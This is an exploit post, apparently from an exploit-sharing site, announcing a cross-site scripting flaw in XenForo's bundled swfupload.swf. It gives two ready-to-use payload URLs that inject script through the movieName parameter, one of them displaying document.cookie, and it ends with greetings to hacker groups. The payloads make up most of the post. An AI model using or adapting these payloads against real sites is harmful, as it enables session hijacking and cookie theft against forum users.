Title: XSS vul in Xenforo CMS.

Author: Darksnipper

CMS Link: www.xenforo.com
vul type: XSS.

VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >

Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army

Or read here:
http://www.exploit4arab.com/exploits/321

XSS vul in Xenforo CMS

Uploaded by: MIN Software

Views:

Category: Exploit, XSS

Share

Tweet